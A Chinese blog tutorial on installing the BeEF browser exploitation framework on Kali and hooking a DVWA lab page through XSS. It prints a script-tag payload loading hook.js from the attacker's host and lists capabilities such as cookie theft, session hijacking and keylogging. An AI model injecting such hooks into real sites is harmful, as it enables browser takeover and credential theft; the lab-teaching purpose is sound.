kali工具之Beef_wulanlin的博客-程序员秘密

技术标签: web安全  安全  网络安全  

*本工具仅供技术分享、交流讨论,严禁用于非法用途。

简介

Browser Exploitation Framework(BeEF) BeEF是日前最强大的浏览器开源渗透测试框架,通过X55漏洞配合JS脚本和 Metasploit进行渗透; BeEF是基于Ruby语言编写的,并且支持图形化界面,操作简单

主要功能

信息收集:

1.网络发现
2.主机信息
3.Cookie获取
4.会话劫持
5.键盘记录
6.插件信息

持久化控制:

1.确认弹框
2.小窗口
3.中间人

社会工程:

1.点击劫持
2.弹窗告警
3.虚假页面
4.钓鱼页面

渗透攻击:

1.内网渗透
2.Metasploit
3.CSRF攻击
4.DDOS攻击

我这里用kali 启动Apache:service apache2 start

然后安装Beef工具

我用脚本安装

命令:
apt-get update
apt-get install beef-xss
apt-get install beef-xss
beef-xss

启动之后

1621257990_60a26f06dc50f9d11de7a.png!small?1621257991992

Hook: <script src="http://<IP>:3000/hook.js"></script>

会弹出来beef的登录窗口

这边我们在看一下beef绑定的3000端口

1621258371_60a270832792d58a44311.png!small?1621258372104

发现绑定3000端口的IP是0.0.0.0

发现是0.0.0.0 监听3000端口

那么远程也是可以访问的

http://192.168.29.131:3000/ui/authentication

1621258049_60a26f41623c115b06d1a.png!small?1621258050359

查看账号密码(也可进行更改)

找到配置文件(kali默认在/etc/beef-xss/config.yaml中);

cat /etc/beef-xss/config.yaml

1621258104_60a26f781db006942fc54.png!small?1621258105043

BeEF-XSS主页面介绍

启动BeFF-XSS并登陆进去

方式一:在命令行中打beef-xss

1621258116_60a26f847a69640c39f5c.png!small?1621258117622

方式二:

1621258228_60a26ff456fd81e7ac2d3.png!small?1621258229523

启动后的界面

1621258241_60a2700122478dbb15323.png!small?1621258242157

Hocked Browers:

online browers 在线浏览器 offline browers 离线浏览器

Detials:浏览器、插件版本信息,操作系统信息

Logs:浏览器动作:焦点变化,鼠标单击,信息输入

*commands:

绿色模块:表示模块适用当前用户,并且执行结果对用户不可见 红色模块:表示模块不适用当前用户,有些红色模块也可以执行 橙色模块:模块可用,但结果对用户可见 灰色模块:模块为在目标浏览器上测试过

payload

这里需要把图中红框中的payload复制粘贴到你的目标xss的位置,然后将其中的<IP>改成你这台kali的IP地址,最终payload为:

'<script src="http://X.X.X.X:3000/hook.js"></script>'

1621258258_60a27012077388e0c52c6.png!small?1621258259259

使用方法

这里我们使用DVWA做实验:

1621258277_60a2702557f243fbe20bb.png!small?1621258278327

这时候再回到BeEF中查看,会发现online browers中多了点东西

1621258285_60a2702dabbaa5c76c3b5.png!small?1621258286805

打开"current Browsers" 下的"commands",就可以运行模块对目标系统进行入侵。

1621258294_60a27036189a1a82bd933.png!small?1621258295202

例子:选择"Brower"下面的"Hooked Domain"的create Alert Dialog(弹窗 ),点击右下角的"execute"运行

1621258310_60a270469c9023498f300.png!small?1621258312457

这样我们就能在DVWA上看到弹窗了。

1621258316_60a2704c99a792c51709e.png!small?1621258317631

也可以执行其他操作

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wulanlin/article/details/122170367

智能推荐

ICML2020 文章目录及下载链接_颹蕭蕭的博客-程序员秘密

2020 年会议线上召开,会议网站也和以往大不相同官网本身就提供了文章的主题分类检索与下载尽管如此,还是希望能够制作一份方便本地查找的目录,毕竟访问外网有点卡下载 json 文件通过网站页面源码分析,发现所有数据都在这份 icml_paper.json 文件中,把它下载下来:https://icml.cc/static/virtual/data/icml_papers.json你要是直接打开的话,就是这个样子,当然我们接下来就用 python 的 json 包来解析它!解析 json 文

logrotate的使用以及注意事项_夏目-的博客-程序员秘密_logrotate 重启

第4条是自己补充的,其他内容转发自:https://blog.csdn.net/u010039418/article/details/81045632注:本文基于CentOS 7.2编写,logrotate版本为logrotate-3.8.6-6.el7.x86_64logrotate用于日志转储,可以根据用户配置的规则,将日志转储,或者删除,防止陈年旧账占满磁盘空间。下面介绍一些注意事项,防止有人掉坑里。1、logrotate依赖cron任务执行我们先看下logrotate这个组件有哪些文.

java前台接口调用,Java 接口调用_亿升笑的博客-程序员秘密

/*** 向指定 URL 发送POST方法的请求* @param url 发送请求的 URL* @param params 请求的参数集合* @return 远程资源的响应结果*/private String sendPost(String url, Map params) {OutputStreamWriter out = null;BufferedReader in = null;String...

pytorch_a69432的博客-程序员秘密

一、Torch与NumpyTorch可以把tensor放到GPU加速上训练,就像Numpy把array放到CPU上训练一样。torch tensor和numpy array的相互转换tensor=torch.from_numpy(array)array=tensor.numpy() 1 import torch 2 import numpy as np 3...

android APK打包过程学习_艾伦蓝的博客-程序员秘密

[size=medium][b]流程概述:[/b][/size]1、打包资源文件,生成R.java文件2、处理aidl文件,生成相应java 文件[color=red]3、编译工程源代码,生成相应class 文件[/color]4、转换所有class文件,生成classes.dex文件5、打包生成apk6、对apk文件进行签名[b]7、对签名后的apk文件进行对齐处理[...

随便推点

matlab中inf是什么意思,simulink中inf什么意思_来自恶魔的爱的博客-程序员秘密

matlab中inf是什么意思infinity的缩写,表示数学中的无穷大,通常用来表示一个数除0的结果。matlab中inf是啥意思MATLAB中的INF参数代表什么意思Inf无穷大量+∞,同样地,-∞可以表示为-Inf。在MATLAB程序执行时,即使遇到了以0为除数的运算,也不会终止程序的运行,而只给出一个“除0”警告,并将结果赋成Inf。matlab中的inf参数代表什么意思请大侠指matla...

vue + echarts 多条折线图_阡路陌人的博客-程序员秘密

html:&lt;!-- 折线图--&gt;&lt;div id="myChart1"/&gt;js: // 折线图 getLine () { // 基于准备好的dom,初始化echarts实例 let myChart1 = echarts.init(document.getElementById('myChart1')); /...

JS+CSS实现的非常漂亮的橘黄色滑动门_weixin_34067102的博客-程序员秘密

代码简介:JS+CSS实现的非常漂亮的橘黄色滑动门,记得有个CSS文件,很棒的。代码内容:&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;&lt;html xmlns="ht...

推荐一个Arduino学习模拟器: 123D Circuites_iracer的博客-程序员秘密_arduino模拟器

123D Circuites是AutoDesk发布的一个专业电子模拟器网站,网址为:https://123d.circuits.io/ 你可以通过虚拟Arduino 板和实验电路板来研究电子问题,可以使用内置的代码编辑器进行Arduino 编程和仿真,方便用户进行原理性验证和实验。

kubernetes入门_Kubernetes入门:一个kubectl速查表_cukw6666的博客-程序员秘密

kubernetes 入门 介绍 (Introduction)Kubectl is a command-line tool designed to manage Kubernetes objects and clusters. It provides a command-line interface for performing common operations like creating a...

字节跳动2022校招内推_高聪江的博客-程序员秘密

字节跳动2022校招研发提前批内部推荐全面启动!冲啊!!!【超快流程】所有岗位无笔试!直接面试更畅快【超稳通关】多一次投递机会,提前批投递结果不影响秋招字节跳动校招内推码: Q26GEKV投递链接: https://jobs.toutiao.com/s/egGJqLH通过此链接投递全程跟进投递状态!...

推荐文章

热门文章

相关标签